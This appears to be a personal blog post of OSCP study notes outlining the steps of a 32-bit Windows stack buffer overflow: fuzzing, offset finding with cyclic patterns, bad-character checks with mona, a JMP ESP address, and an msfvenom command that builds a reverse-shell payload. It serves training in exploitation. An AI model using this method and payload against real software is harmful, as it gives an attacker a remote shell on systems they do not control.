Skip to content

Binary Exploitation (a *very* brief overview)

Binary Exploitation

During my studies to become OSCP certified I studied quite a bit but never delved too far into binary exploitation. Here are a few takeaways and things that I occasionally look back at. Mostly here's the high-level operational view. Mind you, this is for a 32bit windows app lol


1. Start Immunity/app as administrator

2. Confirm connectivity from kali
nc port
3. Fuzz for crash (Template - Fuzzer )
4. Generate cyclic pattern to find exact crash
[root@kali:/root]# cyclic 300
5. Add pattern to "overflow" in and repro crash
6. Get offset from address in EIP and set "offset"

Get address in EIP and find number of bytes to EIP:

[root@kali:/r/c/CMBOF]# cyclic -l 0x61616275
7. Remove cyclic pattern from "overflow" and replace with "A" * offset
offset = 634 # EIP @ 0x616A6761
overflow = b"A" * offset
eip = b"BBBB" # 
8. Replicate crash and confirm "B" in EIP
9. Find Bad Characters with mona
  • Set working dir: !mona config -set workingfolder C:\Windows\Temp
  • Create bytearray (without bad chars we know about) !mona bytearray --cpb "\x00"
  • Include list chars in payload (without \x00)
badchars = [0x00] # start with null
  • Repro crash with charpayload
  • After the crash use mona to find the next bad char: !mona compare -f C:\Windows\Temp\bytearray.bin -a esp
  • Note new bad char, add it to "badchars"
  • Repeat steps until no new bad chars are reported
10. Find Jump Point using bad chars (running or crashed) - will be in "Log Data" window
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
11. Put jmp address in "eip" var backwards (little endian)
eip = b"\xfa\x11\x50\x62" # 625011AF
12. Generate shellcode without bad chars and add as "sc" var
[root@kali:/r/c/t/O/OVERFLOW2]# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=6666 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f python -v sc
13. Add shellcode
14. Add NOPs and comment out "charpayload"
padding = b"\x90" * 16

More questions?